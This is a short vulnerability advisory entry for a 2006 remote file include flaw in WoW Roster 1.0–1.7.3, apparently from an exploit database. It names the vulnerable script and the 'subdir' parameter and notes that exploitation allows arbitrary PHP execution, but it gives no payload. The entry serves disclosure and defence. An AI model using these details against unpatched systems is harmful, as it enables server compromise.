vendor:
World of Warcraft (WoW) Roster
by:
milw0rm.com
8,8
CVSS
HIGH
Remote File Include
98
CWE
Product Name: World of Warcraft (WoW) Roster
Affected Version From: 1.0
Affected Version To: 1.7.3
Patch Exists: YES
Related CWE: N/A
CPE: a:wowroster:world_of_warcraft_roster
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability
A vulnerability exists in World of Warcraft (WoW) Roster, which can be exploited by malicious people to conduct remote file include attacks. This is due to the application not properly sanitizing user-supplied input passed via the 'subdir' parameter to the '/lib/phpbb.php' script. Successful exploitation allows execution of arbitrary PHP code.
Mitigation:
Input validation should be used to ensure that user-supplied input is properly sanitized.
